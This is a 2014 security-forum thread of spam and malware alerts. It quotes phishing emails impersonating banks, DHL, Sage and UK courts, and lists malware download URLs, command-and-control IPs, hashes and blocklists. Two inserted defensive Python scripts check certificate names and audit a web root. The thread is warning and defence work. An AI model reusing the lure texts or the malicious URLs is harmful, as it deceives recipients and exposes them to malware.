During a recent review of your account we found that you are currently logging in from different cities in a suspicious manner that is not compliant with our bank policies.
NatWest customers are not permitted to log in from different places at same time, or using proxies.
For your safety, we have temporarily deactivated your account, to reactive your account please go to our SSL secure link below and update your account credentials.
However, please note that our squad reserves the right to close your account at any time. As such, we encourage you to become familiar with our program policies and monitor your network accordingly.
The email displays the full URL in the text of the legitimate NatWest website, but uses the old trick of making the clickable link take them to a -phish- hosted on a -compromised- website... it’s always a good idea to hover over any clickable link in an email so you can check the final destination... with so many people traveling as part of their job nowadays this could easily snag a few victims."
___
Cryptographic Locker
- http://www.webroot.com/blog/2014/09/05/cryptographic-locker/
Sep 5, 2014 - "... every few weeks we see a -new- encrypting ransomware variant. It’s not surprising either since the business model of ransoming files for money is tried and true. Whether it’s important work documents, treasured wedding pictures, or complete discographies of your favorite artists, everyone has valuable data they don’t want taken. This is the last thing anyone wants to see:
> https://www.webroot.com/blog/wp-content/uploads/2014/09/background-cropped.png
This variant does bring some new features to the scene, but also fails at other lessons learnt by previous variants. Starting with the new features this variant will now just “delete” the files after encrypting them (it just hides them from you). This doesn’t add any more intangibility since they are encrypted with AES-128 anyway, but it does add a greater sense of loss and panic since all of your common data directories will appear to have been cleaned out. Another new feature is the constant rise in price every 24 hours. While price bumping was used on previous variants, this one doesn’t have a limit... this variant falls short on overall volatility is in the failure to delete the VSS (Volume Shadow Service) so using tools like Shadow Explorer* will work to retrieve your files and circumvent paying the ransom. As I’ve said in previous blogs I do expect issues like this to be fixed once this malware is adopted by more botnets for widespread distribution..."
* http://www.shadowexplorer.com/
:fear: :mad:
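The Trend Micro post above tells users to compare the certificate's Common Name with the domain they meant to visit, because a phishing page on a compromised or shared HTTPS host carries a perfectly valid certificate for the wrong name. The following added example (not the post's code) performs that comparison on the dict shape ssl.SSLSocket.getpeercert() returns, preferring subjectAltName as browsers do; the certificate dicts are constructed samples and the shared-host domain is a placeholder.

```python
"""Check that a presented certificate names the site the user intended to visit.

Added example, not from the quoted post. LEGIT_CERT and PHISH_CERT are
constructed in the shape of ssl.SSLSocket.getpeercert(); the
shared-host.example domain is a placeholder.
"""
import socket
import ssl


def cert_names(cert):
    """DNS names from subjectAltName, falling back to the subject Common Name."""
    names = [v for (k, v) in cert.get("subjectAltName", ()) if k == "DNS"]
    if names:
        return names
    for rdn in cert.get("subject", ()):
        for key, value in rdn:
            if key == "commonName":
                names.append(value)
    return names


def name_matches(pattern, hostname):
    """RFC 6125-style match: exact, or a single leftmost wildcard label.
    '*.example.com' matches 'www.example.com' but not 'example.com'
    nor 'a.b.example.com'."""
    pattern, hostname = pattern.lower(), hostname.lower()
    if pattern == hostname:
        return True
    if pattern.startswith("*.") and "*" not in pattern[2:]:
        labels = hostname.split(".")
        return len(labels) >= 3 and ".".join(labels[1:]) == pattern[2:]
    return False


def cert_matches_host(cert, expected_host):
    """True only if the certificate names the host the user expected to reach."""
    return any(name_matches(n, expected_host) for n in cert_names(cert))


def live_check(hostname, port=443, timeout=5):
    """Connect to a site (network required) and report whether the presented
    certificate names it, plus the names it does carry."""
    ctx = ssl.create_default_context()
    with socket.create_connection((hostname, port), timeout=timeout) as sock:
        with ctx.wrap_socket(sock, server_hostname=hostname) as tls:
            cert = tls.getpeercert()
    return cert_matches_host(cert, hostname), cert_names(cert)


# Constructed sample: what the genuine bank login page would present.
LEGIT_CERT = {
    "subject": ((("commonName", "www.bankofamerica.com"),),),
    "subjectAltName": (("DNS", "www.bankofamerica.com"),
                       ("DNS", "bankofamerica.com")),
}
# Constructed sample: a valid wildcard cert for a shared hosting domain,
# the kind of cert an HTTPS phishing page inherits from its host.
PHISH_CERT = {
    "subject": ((("commonName", "shared-host.example"),),),
    "subjectAltName": (("DNS", "*.shared-host.example"),),
}

if __name__ == "__main__":
    print(cert_matches_host(LEGIT_CERT, "www.bankofamerica.com"))   # True
    print(cert_matches_host(PHISH_CERT, "www.bankofamerica.com"))   # False
    print(cert_names(PHISH_CERT))                                   # ['*.shared-host.example']
```

The point the post makes is the second line: the padlock is green on the phishing host too, and only comparing the certificate's names against the domain you intended to visit tells the two apart.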
AplusWebMaster
2014-09-08, 13:20
FYI...
Fake BH Live Tickets SPAM - (bhlive .co.uk / bhlivetickets .co.uk)
- http://blog.dynamoo.com/2014/09/bh-live-tickets-peter-pan-spam.html
8 Sep 2014 - "... very large quantity of these spam emails, purporting to be from:
From: bhlivetickets@ bhlive .co.uk
Date: 8 September 2014 08:43
Subject: Confirmation of Order Number 484914
ORDER CONFIRMATION
Order Number Order Date
484914 07-09-2014 13:00
YOUR E-TICKET(S) ARE ATTACHED TO THIS EMAIL, SENT TO [redacted]. Please print ALL PAGES of the PDF file attached to the email and bring them with you to gain admission to the event...
These emails are -not- from BH Live Tickets and their systems have not been compromised in any way. Instead, these emails are a forgery with an attachment (tickets.3130599.zip or similar) which in turn contains a malicious executable (in this case tickets.332091.exe). The VirusTotal detection rate for this malware is just 3/55*. Comodo CAMAS reports** that this downloads an additional component from tiptrans .com .tr/333 which has a VirusTotal detection rate of 4/51***. According to ThreatExpert****, this second component POSTs some information to 80.94.160.129:8080 (OVH, France) and also appears to contact 92.222.46.165 (National Academy Of Sciences Of Belarus).
Recommended blocklist:
tiptrans .com .tr
92.222.46.165
80.94.160.129"
* https://www.virustotal.com/en-gb/file/7a3a9360cd4dae87981e9e56a988e149223266512ebd468f7c59aacda2c1bfe3/analysis/1410162673/
** http://camas.comodo.com/cgi-bin/submit?file=7a3a9360cd4dae87981e9e56a988e149223266512ebd468f7c59aacda2c1bfe3
*** https://www.virustotal.com/en-gb/file/41de66fb7dc00dd5fe19e2fa6247af3b30b2ed3a80eadc1cc4410ea8b227ef47/analysis/1410163490/
**** http://www.threatexpert.com/report.aspx?md5=992acfe50852f1287394a991645aec4b
- http://myonlinesecurity.co.uk/confirmation-order-number-fake-pdf-malware/
8 Sep 2014
Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2014/09/bhlive_ticketsd.png
> https://www.virustotal.com/en-gb/file/72caf25189d16d81915d78c494cf5b7c93f45b254cb25e31526f7b5b546a9e83/analysis/1410164460/
___
Fake RBS "Important Docs" SPAM - again ...
- http://blog.dynamoo.com/2014/09/rbs-importat-docs-spam.html
8 Sep 2014 - "The Royal Bank of Scotland has been spoofed several times recently, this latest fake spam contains a payload that looks like it might be Cryptowall.
Date: Mon, 8 Sep 2014 15:00:22 +0100 [10:00:22 EDT]
From: Vicente Mcneill [Vicente@rbs .co.uk]
Subject: Important Docs
Please review attached documents regarding your account.
Tel: 01322 929655
Fax: 01322 499190
email: Vicente@ rbs .co.uk ...
Attached is an archive RBS_Account_Documents.zip containing a malicious executable RBS_Account_Documents.scr which has a detection rate at VirusTotal of 4/53*... analysis shows that it attempts to download components from the following locations:
95.141.37.158/0809uk1/NODE01/0/51-SP3/0/
95.141.37.158/0809uk1/NODE01/1/0/0/
95.141.37.158/0809uk1/NODE01/41/5/4/
bullethood.com/ProfilePics/0809uk1.zip
95.141.37.158 is SeFlow.it Internet Services, Italy. bullethood .com is on a shared server at GoDaddy. The malware also appears to be attempting to connect to 94.23.250.88 (OVH, France).
Recommended blocklist:
bullethood .com
95.141.37.158
94.23.250.88"
* https://www.virustotal.com/en-gb/file/f9046c5fbdddee04dd8fbf6e187a630b88a961243b20933afcb0e36091847d59/analysis/1410183105/
___
Cryptowall ransomware ...
- http://arstechnica.com/security/2014/09/ransomware-going-strong-despite-takedown-of-gameover-zeus/
Sept 7 2014 - "... Within a week of the takedown of Gameover Zeus and Cryptolocker, a surge of spam with links to a Cryptolocker copycat, known as Cryptowall, resulted in a jump in ransomware infections, states a report released last week by security-services firm Dell Secureworks*. Cryptowall first appeared in November 2013, and spread slowly, but the group behind the program were ready to take advantage of the vacuum left by the downfall of its predecessor. Being prepared paid off: In six months, the Cryptowall group infected nearly 625,000 systems, and even though only 0.27% of victims paid, the group still made $1.1 million, according to data from a command-and-control server discovered by Dell Secureworks..."
* http://www.secureworks.com/cyber-threat-intelligence/threats/cryptowall-ransomware/
___
‘Dyre’ malware goes after Salesforce users
- https://blog.malwarebytes.org/cyber-crime/2014/09/dyre-malware-goes-after-salesforce-users/
Sep 8, 2014 - "San Francisco-based company Salesforce well-known for its cloud-based Customer Relationship Management (CRM) software, emailed a security advisory to its customers, late Friday.
Copy of the email sent by Salesforce:
> https://blog.malwarebytes.org/wp-content/uploads/2014/09/salesforce_email.png
The threat known as Dyre was originally spotted by security firm CSIS* and by PhishMe** which also had uncovered the new malware earlier in June. Back then, the threat was aimed at banks and other financial institutions, something very reminiscent of other banking Trojans such as Zeus and its variants. But researchers discovered that the malware is now capable of capturing login credentials from Salesforce users by -redirecting- them through a phishing website. Dyre will initially infect users through some form of social-engineering, typically with an email that contains a malicious attachment. Once on the system, the malware can act as a man-in-the-middle and intercept every single keystroke. To be clear, this is not a vulnerability with Salesforce or its website, but rather a type of malware that leverages compromised end-point machines... This type of attack could be mean there might be a new trend on the horizon, one that goes after Software as a Service (SaaS) users. Businesses increasingly rely on third-party software providers for their needs because it can be a cheaper option without all the headaches of doing it yourself. For example, instead of managing their own email server, companies will use Office365 or similar cloud-based email solutions. Banking credentials are still the bread-and-butter for the majority of cyber-crooks because they can be immediately used. But the data harvested from many SaaS applications also holds a tremendous value for those willing to invest the time to dig in and find bits of information that could lead to a large compromise in a top-tier business. There is no silver bullet to defend against these threats but once again a healthy balance of end-user education about phishing scams and proper end-point security solutions will go a long way. Data exfiltration is one the most important issues of 2014 with a growing number of businesses being affected. 
The effects on companies’ brands and trust of their customers can be very damaging and long lasting, not to mention the potential lawsuits that often follow.:
* https://www.csis.dk/en/csis/news/4262/
** http://phishme.com/project-dyre-new-rat-slurps-bank-credentials-bypasses-ssl/
___
Fake "PAYMENT SLIP" SPAM - with an encrypted .7z archive
- http://blog.dynamoo.com/2014/09/payment-slip-spam-comes-with-encrypted.html
8 Sep 2014 - "This spam comes with a malicious attachment:
From: daniel mo [danielweiche002@ gmail .com]
Subject: PAYMENT SLIP
Signed by: gmail .com
Thanks for your last message,
We remitted 30% prepayment today amounting to 51,300USD against your invoice INV332831 as was agreed with you by our purchasing agent. Please check the attached invoice and the payment slip and correspond your account information. You will receive payment in your account after a few days.
Please confirm the receipt below,
kindly use this password {121212} to view attachment for our payment slip;
Thanks,
Daniel
Accounts Assistant
67752222
64472801
Zenia Singapore Pte Ltd
In order to deal with the attachment new order.7z, you'll need something capable of dealing with .7z files (e.g. 7-Zip). Inside the archive is a malicious executable new order.scr which has a VirusTotal detection rate of 5/54*. I have not been able to analyse the malware any further than this."
* https://www.virustotal.com/en-gb/file/b1277d881f6504e668eabdaaced21f66618b2a0cd25ad94fc1e1b1a31806f363/analysis/1410186462/
___
RBC Royal Bank Phish - and PDF malware
- http://myonlinesecurity.co.uk/received-new-secure-message-rbc-royal-bank-customer-service-phishing/
8 Sep 2014 - "'You have received a new secure message from RBC Royal Bank Customer Service' pretending to come from RBC Royal Bank Customer Service <securemessage@ rbc .com> is an attempt to -scam- you and get your bank log on details. It also is trying to infect you and is another one from the current zbot runs which try to drop cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... This email is particularly devious, evil and crafty as it sends you to a site that at first glance you think is a phishing site (if you are unwise enough to click any of the links in the email). However that site also has a hidden iframe that tries to download some malware to the computer if you have a vulnerable version of Java. Then if that isn’t enough when you fill in the log in details on the page the buttons on the page appear to link to the genuine RBC bank site so hovering over the links will fool you into thinking that you are on the genuine RBC site:
> http://myonlinesecurity.co.uk/wp-content/uploads/2014/09/rbc.png
... then the sign in button leads you to this webpage where any of the links or the buttons download what appears to be a genuine PDF file that looks blank. That file is a malformed PDF with a script virus embedded that will infect you. This file 09.08.14report.pdf has a current VirusTotal detection rate of 5/55*. These emails contain a genuine PDF file that is malformed and contains a script virus and can infect you with no action on your part by simply previewing the PDF in your browser or in the PDF reader..."
* https://www.virustotal.com/en/file/8c966250202f464973929a31886b6ba8d4454425f9348000833091f9d9e8c59a/analysis/1410199439/
- http://threattrack.tumblr.com/post/96988594103/rbc-royal-bank
Sep 8, 2014 - "Subjects Seen:
You have received a new secure message from RBC Royal Bank Customer Service
Typical e-mail details:
You have received a secure message
This is an automated message sent by Royal Bank Secure Messaging Server.
The link above will only be active until: 09/10/2014
Please click here or follow this link : royalbank.com/cgi-bin/rbaccess/rbcgi3m01
Help is available 24 hours a day by email at secure.emailhelp @rbcroyalbank.com
If you have concerns about the validity of this message, please contact the sender directly. For questions about Royal Bank’s e-mail encryption service, please contact technical support at 1-800-769-2511.
First time users - will need to register before reading the Secure Message.
Malicious URLs:
halilbekrek .com/TUTOS/libs/excel/install6.exe
66.235.98.169/rbc.com/webapp/ukv0/signin/logon.php
66.235.98.169/rbc.com/webapp/ukv0/signin/report/09.08.14report.pdf
84.45.53.45/rbc.com/webapp/ukv0/signin/logon.php
84.45.53.45/rbc.com/webapp/ukv0/signin/message.html
84.45.53.45/rbc.com/webapp/ukv0/signin/report/09.08.14report.pdf
Malicious File Name and MD5:
install6.exe (e3fbc7b3bf11f09c5ee33b1e1b45f81b)
09.08.14report.pdf (ecddafa699814679552d2bf95fc087e5)
OfigGigg.dat (85d42ccc12301bbda27abf4c0b7eb7ff)
66.235.98.169: https://www.virustotal.com/en/ip-address/66.235.98.169/information/
84.45.53.45: https://www.virustotal.com/en/ip-address/84.45.53.45/information/
Tagged: RBC, Vawtrak, CVE-2013-2729
___
Fake Tcn Invoice SPAM – PDF malware
- http://myonlinesecurity.co.uk/tcn-invoice-n265588248042e-fake-pdf-malware/
8 Sep 2014 - "'Tcn Invoice # N265588248042E' pretending to come from Katharine Norwood <Katharine.Norwood@ advanced-ornamentation .com> is another one from the current zbot runs which try to drop cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment...
Good morning...
I requested an invoice yesterday; on the invoice it shows a charge of $585.15 although on my credit card statement it shows a charge of $185.13. Can you please advise on what the total should be and if it is for the amount of $185.13 can you please provide an invoice with that amount.
Thank you.
Katharine Norwood
Administrative Assistant
San Diego, CA 92135
205 840-2913
8 September 2014: Invoice.zip ( 48 kb) : Extracts to Invoice.pdf.scr
Current Virus total detections: 4/55*. This 'Tcn Invoice # N265588248042E' is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/52c344196cf767035c404995bb4237677540b2f17e815c4d5433f7b35ffa4d4d/analysis/1410198304/
___
Twitter Phish SPAM: “Strange Rumors About You”
- https://blog.malwarebytes.org/fraud-scam/2014/09/twitter-phishing-spamrun-strange-rumors-about-you/
Sep 8, 2014 - "... an ongoing Twitter spam attack which is sending potential victims to phishing pages via a Tumblr -redirect- . Compromised Twitter accounts and / or bots are sending variations of the below to Twitter users:
> https://blog.malwarebytes.org/wp-content/uploads/2014/09/twitterspam1.jpg
We’ve seen some 200+ messages sent in the last ten minutes, and this attack has been ongoing for at least six hours. Here’s the Tumblr -spam- blog which is redirecting to the fake Twitter login, and the -fake- login itself:
> https://blog.malwarebytes.org/wp-content/uploads/2014/09/twitterspam2.jpg
...
> https://blog.malwarebytes.org/wp-content/uploads/2014/09/twitterspam3.jpg
The -fake- page reads:
“Your current session has ended.
For security purposes your [sic] were forcibly signed out. You need to verify your Twitter account, please relogin.”
Twitter users should -avoid- signing into Twitter via any of the links being sent around, and always check the URL to ensure they’re entering their credentials in the right place."
211.154.136.106: https://www.virustotal.com/en/ip-address/211.154.136.106/information/
:fear: :mad:
AplusWebMaster
2014-09-09, 15:47
FYI...
Fake Bill.com Invoice SPAM – PDF malware
- http://myonlinesecurity.co.uk/bill-com-invoice-paid-fake-pdf-malware/
9 Sep 2014 - "'Bill.com Invoice has been paid' pretending to come from The Bill .com Team <notificationonly@ hq.bill .com> is another one from the current zbot runs which try to drop cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... Email reads:
[ Bill .com image ]
Hi,
Thank you for payment to Bill.com. The credit/debit card you have on file with us was successfully charged $115.33 for the billing period 08/01/14-09/01/14.
The Statement for this account is now available for viewing. Please find it attached to this email.
Have questions? Sign in at our website, then contact support.
Thank you,
The Bill .com Team
Please do not respond to this email. This e-mail was sent from a notification-only e-mail address.
9 September 2014: bill-d59f78596bfa79e01898cf9d0e645b99328028d597e9005146787f09435a01016270d6ffc5d69ec27901.zip ( 486 kb):
Extracts to BILL_ID_895634523945258345873645763459879876432985763298563253245.pdf.exe Current Virus total detections: 28/55*. This Bill .com Invoice has been paid is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/e3c2b761ce6a188e9669480d52368f3e865499a06813d939c23ad915d49cba62/analysis/1410252379/
____
“Google dorking“ ...
- http://blog.trendmicro.com/trendlabs-security-intelligence/google-dorking-waking-up-web-admins-everywhere/
Sep 9, 2014 - "Last July, the US Department of Homeland Security warned of a new kind of criminal attack: “Google dorking“*. This refers to asking Google for things they have found via special search operators... Google finds things online using a program that accesses web sites: the Google web crawler, called the Googlebot. When the Googlebot examines the web and finds “secret” data, it adds it to Google’s database just like any other kind of information... suppose your company’s HR representative left a spreadsheet with -confidential- employee data -online- . Since it’s open for everyone to access, the crawler sees and indexes it. From then on, even though it might have been hard to find before, a simple – or not so simple – Google search will point any attacker to it. Google never stored the actual data (unless it was cached), it just made it easier to find. This kind of “attack” has been around for as long as search engines have been around. There are whole books devoted to the subject of “Google dorking”, which is more commonly known as “Google hacking”. Books have been published about it for years, and even the NSA has a 643-page manual that describes in detail how to use Google’s search operators to find information. The warning – as ridiculous as it might seem – has some merit... finding information that has been carelessly left out in the open is not strictly criminal: at the end of the day, it was out there for Googlebot to find. Google can’t be blamed for finding what has been left public; it’s the job of web admins to know what is and isn’t on their servers wide open for the world to see. It’s not just confidential documents that are open to the public, either. As we noted as far back as 2013, industrial control systems could be found via Google searches. Even more worryingly, embedded web servers (such as those used in web cameras) are found online all the time with the Shodan search engine.
This latter threat was first documented in 2011, which means that IT administrators have had three years to shut down these servers, but it’s still a problem to this day. In short: this problem has been around for a while, but given that it’s still around an official warning from the DHS is a useful reminder to web admins everywhere: perform “Google dorking” against your own servers frequently, looking for things that shouldn’t be there. If you don’t, somebody else will and their intentions might not be so pure..."
* https://publicintelligence.net/feds-google-dorking/
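The Trend Micro post above tells web admins to check their own servers for material that should not be public. The script below is an added example (not code from Trend Micro or from this thread) that does the local half of that check: it walks a document root and reports the kind of leftovers a crawler would index. The extension lists, the "no index file" heuristic (which assumes an autoindex-style server and does not read the server configuration) and the sample tree are all assumptions constructed for illustration.

```python
"""Audit a web document root for material a search-engine crawler would happily index.

Added example, not code from the Trend Micro post: it does the local half of
"Google dork your own servers" by walking the document root. The extension lists,
the index-file heuristic and the sample tree are constructed assumptions.
"""
import os
import tempfile

# File types that rarely belong in a public web root (spreadsheets, dumps, backups, secrets).
SENSITIVE_EXTS = {".xls", ".xlsx", ".csv", ".sql", ".bak", ".old", ".log", ".env"}
# Names that are sensitive regardless of extension (files or directories).
SENSITIVE_NAMES = {".env", ".htpasswd", "id_rsa", ".git", ".svn"}
INDEX_FILES = {"index.html", "index.htm", "index.php"}


def audit_webroot(root):
    """Return sorted (relative path, reason) pairs; relative paths use '/' on every platform."""
    findings = []

    def rel(path):
        return os.path.relpath(path, root).replace(os.sep, "/")

    for dirpath, dirnames, filenames in os.walk(root):
        # An exposed VCS metadata directory is a finding on its own; do not descend into it.
        for d in list(dirnames):
            if d in SENSITIVE_NAMES:
                findings.append((rel(os.path.join(dirpath, d)), "exposed directory"))
                dirnames.remove(d)
        # Assumption: a directory without an index file may be listed by a server with
        # autoindex enabled. Only the file layout is checked here, not the server config.
        if not INDEX_FILES.intersection(filenames):
            findings.append((rel(dirpath), "no index file"))
        for f in filenames:
            ext = os.path.splitext(f)[1].lower()
            if f in SENSITIVE_NAMES or ext in SENSITIVE_EXTS:
                findings.append((rel(os.path.join(dirpath, f)), "sensitive file type"))
    return sorted(findings)


def build_sample_webroot():
    """Constructed sample tree in a temp dir: one clean page plus the kind of leftovers the post describes."""
    root = tempfile.mkdtemp(prefix="webroot-")
    layout = {
        "index.html": "<html>ok</html>",
        "hr/employees.xlsx": "fake spreadsheet bytes",   # the HR spreadsheet scenario from the post
        "backup/site.sql": "-- fake dump",
        ".git/HEAD": "ref: refs/heads/master",
    }
    for relpath, content in layout.items():
        full = os.path.join(root, *relpath.split("/"))
        os.makedirs(os.path.dirname(full), exist_ok=True)
        with open(full, "w") as fh:
            fh.write(content)
    return root


if __name__ == "__main__":
    for path, reason in audit_webroot(build_sample_webroot()):
        print(f"{reason:20s} {path}")
```

Run it against a real document root with `audit_webroot("/var/www/html")`; anything it reports is a candidate for removal or access control before a crawler (or a Shodan-style scanner) gets to it.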
___
Fake Sage Outdated Invoice SPAM – PDF malware
- http://myonlinesecurity.co.uk/sage-outdated-invoice-fake-pdf-malware/
9 Sep 2014 - "'Outdated Invoice' pretending to come from Sage Account & Payroll <invoice@ sage .com> is another one from the current zbot runs which try to drop cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... Email reads:
[Sage logo image ]
Sage Account & Payroll
You have an outdated invoice from Sage Accounting that is ready for payment. To find out more details on this invoice, please follow the link bellow or click here to view/download your account invoice:
... Account?432532=Invoice_090914.zip
If we hold any information about you which is incorrect or if there are any changes to your details please let us know by so that we can keep our records accurate and up to date. If you would like to update your records or see a copy of the information that we hold about you, you can contact us at Data Protection Officer, Sage (UK) Ltd, North Park, Newcastle-upon-Tyne, NE13 9AA or by email to digital@sage.com. If you request a copy of your information you will need to pay a statutory fee which is currently £10.
The contents of this email and any attachments are confidential...
9 September 2014: invoice_090914.zip ( 18kb) : Extracts to invoice_090914.scr
Current Virus total detections: 4/55* . This 'Outdated Invoice' is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/e7b04220bc9c21161ba5f6aac8cd7bc2c7951aa80fc68b2d196cb9da7a78dc8d/analysis/1410267601/
- http://blog.dynamoo.com/2014/09/sage-outdated-invoice-spam.html
9 Sep 2014
"Recommended blocklist:
95.141.37.158 ..."
(More detail at the dynamoo URL above.)
95.141.37.158: https://www.virustotal.com/en/ip-address/95.141.37.158/information/
___
Fake NatWest Invoice SPAM - PDF malware
- http://myonlinesecurity.co.uk/important-new-account-invoice-fake-pdf-malware/
9 Sep 2014 - "'Important – New account invoice' pretending to come from NatWest Invoice <invoice@ natwest .com> is another one from the current zbot runs which try to drop cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... Email reads:
[NatWest logo image]
Your latest NatWest invoice has been uploaded for your review. If you have any questions regarding this invoice, please contact your NatWest service team at the number provided on the invoice for assistance.
To view/download your invoice please click here or follow the link below...
9 September 2014: invoice_090914.zip ( 18kb) : Extracts to invoice_090914.scr
Current Virus total detections: 4/55* . This 'Important – New account invoice' is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/e7b04220bc9c21161ba5f6aac8cd7bc2c7951aa80fc68b2d196cb9da7a78dc8d/analysis/1410267601/
___
Fake Worker’s Compensation SPAM – word.doc malware
- http://myonlinesecurity.co.uk/hmcts-workers-compensation-appeal-fake-word-doc-malware/
9 Sep 2014 - "'HMC&TS Worker’s Compensation Appeal' pretending to come from HM Courts and Tribunals Service <submit.wjq@ courtsni .gov.uk> is another one from the current zbot runs which try to drop cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... So far today I have seen several subjects for this email:
HMC&TS Worker’s Compensation Appeal
Worker’s Compensation Summons
HM Courts & Tribunals Service Summons
HM Courts & Tribunals Service
All the emails are very similar, but will have different courts or tribunals listed and different dates, case numbers and tribunal members. The faked sender will always be the same name as the recipient of the email with a few random letters after the name... Email reads:
Worker’s Compensation Appeal Tribunal
Decision # 502
Board Direction To Rehear Decision #695
Claim No.: 2504=5704
Date of Original Notice of Appeal: June 10, 2014
Date Received at The Tribunal: June 19, 2014
Date of Board Direction to Rehear: August 11, 2014
Received: August 20, 2014
Date of Documentary Review by Appeal Committee: August 23, 2014
Date of Decision: September 6, 2014
To Whom It May Concern,
Your Corporation (named Respondent)
Appears to be in default because of its failure to comply with the Administrative Law Judge’s Prehearing Order without decent cause, and such default by Respondent constitutes an admission of all facts alleged in the Complaint and a waiver of Respondent’s right to contest such factual allegations. Respondent violated the section 9(6), paragraph B13(1) of the Jobseekers Act 1995.
We recommend you to download a copy of original Complaint at Tribunal in attachment below...
9 September 2014: Copy68789.zip (66kb): Extracts to Copy of original Complaint at Tribunal.docx.exe
Current Virus total detections: 1/55* . This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper Microsoft word .doc instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/c765b5ba935a3c872388185940ca89570a1710e89148ce25caf1a54148079800/analysis/1410269102/
- http://threattrack.tumblr.com/post/97055148048/hm-courts-tribunals-service-spam
Sep 9, 2014
Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/4cb469a9e44e608eacef08eba6109111/tumblr_inline_nbmytoLcAX1r6pupn.png
Malicious File Name and MD5:
Copy4855.zip (854ADF297E8B1D79BA0E744F90AFDE50)
Copy of original Complaint at Tribunal.docx.exe (6D9BDE90B81C064ACA5ED994BC8A981A)
Tagged: HM Courts & Tribunals, Kuluoz
___
Hackers throw 25 malware variants at Apple Mac OS X
- http://www.theinquirer.net/inquirer/news/2363995/hackers-throw-25-malware-variants-at-apple-mac-os-x
Sep 9 2014 - "... 25 varieties of malware, some of which are being used in targeted attacks, warns security firm F-Secure. F-Secure reported uncovering the malware variants in its Threat Report H1 2014*, claiming it discovered the first 20 attack tools earlier this year..."
* http://www.f-secure.com/weblog/archives/00002741.html
Sep 8, 2014
:mad: :fear:
AplusWebMaster
2014-09-10, 14:17
FYI...
Fake DHL invoice SPAM
- http://blog.dynamoo.com/2014/09/geir-myklebust-dhl-no.html
10 Sep 2014 - "Geir Myklebust is a real employee for DHL in Norway, but neither he nor DHL are responsible for this spam run in any way (their systems have NOT been breached either). Instead, it contains a malicious attachment and it should simply be deleted.
From: Geir Myklebust (DHL NO) [Geir.Myklebust@ dhl .com]
Date: 10 September 2014 10:35
Subject: FW: customer acct. no.: 4690086 - invoice 0257241 needs to be paid
Dear Sir.
The attached invoice from Villmarksmessen 2014 has still not been settled.
Please advise as soon as possible.
Thank you and regards,
Geir
Med vennlig hilsen/ Kind Regards
Geir Myklebust
Product Manager, Avd. Trade Fairs & Events
DHL Global Forwarding (Norway) AS
Avd. Trade Fairs & Events
Messeveien 14
2004 Lillestrøm ...
Attached is a ZIP file of various different names (e.g. invoice_0257241.zip), containing a malicious executable file invoice_3466198.exe which has a VirusTotal detection rate of 3/54*. The Comodo CAMAS report** shows an attempted connection to voladora .com/Imagenes/qaws.cab which is currently coming up with a socket error. I would recommend that you block access to that domain. Further analysis is pending..."
* https://www.virustotal.com/en-gb/file/779955dd6a5da605f2432449bf1edc35e356a251cf43f3cbfda704a26cac5038/analysis/1410342283/
** http://camas.comodo.com/cgi-bin/submit?file=779955dd6a5da605f2432449bf1edc35e356a251cf43f3cbfda704a26cac5038
"UPDATE: a second malicious binary is doing the rounds, this time with a detection rate of 2/53***..."
*** https://www.virustotal.com/en-gb/file/febd053fdafbc097eedbacac3e0f97d912f7925ddab0dfc90a32895dac35fbdd/analysis/1410353017/
92.43.17.6: https://www.virustotal.com/en/ip-address/92.43.17.6/information/
- http://myonlinesecurity.co.uk/fw-customer-acct-186588-invoice-9782264-needs-paid-fake-pdf-malware/
10 Sep 2014
- https://www.virustotal.com/en/file/febd053fdafbc097eedbacac3e0f97d912f7925ddab0dfc90a32895dac35fbdd/analysis/1410350810/
___
Fake Overdue invoice SPAM – doc malware
- http://myonlinesecurity.co.uk/overdue-invoice-1197419584-fake-doc-malware/
10 Sep 2014 - "'Overdue invoice #1197419584' is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:
Good afternoon,
I was hoping to hear from you by now. May I have payment on invoice #1197419584 today please, or would you like a further extension?
Best regards,
Cherish Schaunaman
+07540 61 15 69
... or like this one:
This email contains an invoice file in attachment.
10 September 2014 : bill_2014-09-10_09-16-23_1197419584.arj :
Extracts to: bill_2014-09-10_09-16-23_1197419584.exe
Current Virus total detections: 6/55*
Alternative version 10 September 2014 : Invoice4777_2C7.zip :
Extracts to: attachment_scaned.doc .exe
Current Virus total detections: 2/54**
This 'Overdue invoice #1197419584' is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper Microsoft word.doc file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/4c6d8f5ad6ff6f35be8b2fe921fc65619ba5708b5a0597a6929fd3bc3f36aabb/analysis/1410342531/
** https://www.virustotal.com/en/file/877eab31951bb48139f0ec592ce906ff3891a74f078af494eeb8ccbc9d913b52/analysis/1410341816/
___
'Outstanding Warrant' Phone SCAMS
- http://www.hoax-slayer.com/outstanding-warrant-phone-scams.shtml
